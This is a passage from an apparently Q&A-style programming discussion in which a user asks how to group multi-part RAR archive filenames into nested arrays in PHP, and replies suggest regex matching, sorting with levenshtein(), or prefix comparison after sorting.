koncert_20v_20dk_20kommuna_20chast1.rar,
books.part2.rar,
koncert_20v_20dk_20kommuna_20chast2.rar,
books.part4.rar,
recedivist.rar,
LP_LIVE_PR_Tampa.part1.rar
)
And I'm looking for the output
array(
array(
books.part1.rar
books.part2.rar
books.part3.rar
books.part4.rar ) ,
00000114.rar
svoy_20ostrov.rar
koncert_20v_20dk_20mir.rar
koncert_20v_20centralnom_20teatre_20kukol.rar
koncert_20v_20dk_20vami.rar
array(
koncert_20v_20dk_20kommuna_20chast1.rar
koncert_20v_20dk_20kommuna_20chast2.rar
)
recedivist.rar
array (
LP_LIVE_PR_Tampa.part1.rar
LP_LIVE_PR_Tampa.part2.rar
)
)
I'm using php as a programming language, by the way,
An idea was to match with a regular expression files like (.+).part1.rar then when found , match all the other part([0-9]+).rar (other foreach required that loops through all array) and when found unset() those entries and add them to the new constructed array
I would sort the array first and then loop through it, performing the Levenshtein() function on the next entry.
$rars = array(
books.part1.rar,
books.part3.rar,
00000114.rar,
svoy_20ostrov.rar,
svoy_20ostrov.rar,
koncert_20v_20dk_20mir.rar,
koncert_20v_20centralnom_20teatre_20kukol.rar,
LP_LIVE_PR_Tampa.part2.rar,
koncert_20v_20dk_20vami.rar,
koncert_20v_20dk_20kommuna_20chast1.rar,
books.part2.rar,
koncert_20v_20dk_20kommuna_20chast2.rar,
books.part4.rar,
recedivist.rar,
LP_LIVE_PR_Tampa.part1.rar
)
sort($rars);
$current = 0;
$rars_complete = array();
foreach($rars as $i=>$rar) {
$next = ($i + 1) < count($rars)) ? $i + 1 : false;
$rars_complete[$current][] = $rar;
if($next != false && levenshtein($rar, $rars[$next]) == 1)
continue;
else
$current++;
}
Note, this is not tested.
Why don't you just sort the array? Then all you have to do is detect when the begin of the string changes to see when a new set started.